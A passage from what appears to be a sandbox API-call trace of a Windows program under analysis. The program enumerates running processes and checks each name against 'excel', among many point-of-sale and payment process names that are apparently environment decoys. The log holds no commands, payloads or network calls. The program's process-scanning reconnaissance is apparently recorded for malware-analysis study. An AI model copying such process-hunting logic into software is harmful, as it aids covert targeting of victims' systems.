lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0096.466] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0096.466] StrStrIA (lpFirst="accupos.exe", lpSrch="excel") returned 0x0 [0096.466] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0096.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.468] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3577690 [0096.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3577690, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0096.468] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0096.468] StrStrIA (lpFirst="afr38.exe", lpSrch="excel") returned 0x0 [0096.468] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0096.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.469] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35776a8 [0096.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x35776a8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0096.469] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0096.469] StrStrIA (lpFirst="aldelo.exe", lpSrch="excel") returned 0x0 [0096.469] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0096.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0096.470] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x35776c0 [0096.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x35776c0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0096.470] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0096.470] StrStrIA (lpFirst="ccv_server.exe", lpSrch="excel") returned 0x0 [0096.470] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0096.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0096.526] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x35751c0 [0096.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x35751c0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0096.526] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0096.526] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="excel") returned 0x0 [0096.526] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0096.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0096.527] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3575440 [0096.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x3575440, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0096.528] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0096.528] StrStrIA (lpFirst="creditservice.exe", lpSrch="excel") returned 0x0 [0096.528] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0096.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.529] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577768 [0096.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3577768, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0096.529] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0096.529] StrStrIA (lpFirst="edcsvr.exe", lpSrch="excel") returned 0x0 [0096.529] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0096.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.530] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35777b0 [0096.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x35777b0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0096.530] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0096.531] StrStrIA (lpFirst="fpos.exe", lpSrch="excel") returned 0x0 [0096.531] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0096.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.532] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35775a0 [0096.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x35775a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0096.532] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0096.532] StrStrIA (lpFirst="isspos.exe", lpSrch="excel") returned 0x0 [0096.532] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0096.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0096.533] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3575140 [0096.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3575140, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0096.533] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0096.533] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="excel") returned 0x0 [0096.533] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0096.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.535] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577738 [0096.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3577738, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0096.535] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0096.535] StrStrIA (lpFirst="omnipos.exe", lpSrch="excel") returned 0x0 [0096.535] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0096.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.536] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35776d8 [0096.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x35776d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0096.536] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0096.536] StrStrIA (lpFirst="spcwin.exe", lpSrch="excel") returned 0x0 [0096.536] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0096.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0096.537] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x35750a0 [0096.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x35750a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0096.538] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0096.538] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="excel") returned 0x0 [0096.538] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0096.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.539] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3577858 [0096.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3577858, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0096.539] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0096.539] StrStrIA (lpFirst="utg2.exe", lpSrch="excel") returned 0x0 [0096.539] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0096.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.540] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35775d0 [0096.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x35775d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0096.540] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0096.540] StrStrIA (lpFirst="saying.exe", lpSrch="excel") returned 0x0 [0096.540] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0096.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.542] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3577840 [0096.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3577840, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0096.542] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0096.542] StrStrIA (lpFirst="ripe.exe", lpSrch="excel") returned 0x0 [0096.542] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0096.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.543] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35776f0 [0096.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x35776f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0096.543] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0096.543] StrStrIA (lpFirst="acoustic.exe", lpSrch="excel") returned 0x0 [0096.543] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0096.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.544] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3577600 [0096.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3577600, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0096.544] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0096.545] StrStrIA (lpFirst="mail.exe", lpSrch="excel") returned 0x0 [0096.545] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0096.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.546] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35777f8 [0096.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35777f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0096.546] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0096.546] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="excel") returned 0x0 [0096.546] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.547] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577708 [0096.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577708, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.547] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.547] StrStrIA (lpFirst="svchost.exe", lpSrch="excel") returned 0x0 [0096.547] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0096.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.549] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577630 [0096.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3577630, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.549] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0096.549] StrStrIA (lpFirst="dllhost.exe", lpSrch="excel") returned 0x0 [0096.549] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0096.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.550] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35779f0 [0096.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35779f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0096.551] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0096.551] StrStrIA (lpFirst="taskhostw.exe", lpSrch="excel") returned 0x0 [0096.551] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0096.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.552] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3577b58 [0096.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3577b58, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0096.552] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0096.552] StrStrIA (lpFirst="UsoClient.exe", lpSrch="excel") returned 0x0 [0096.552] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0096.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.553] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3577b10 [0096.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3577b10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0096.553] lstrcpyA (in: 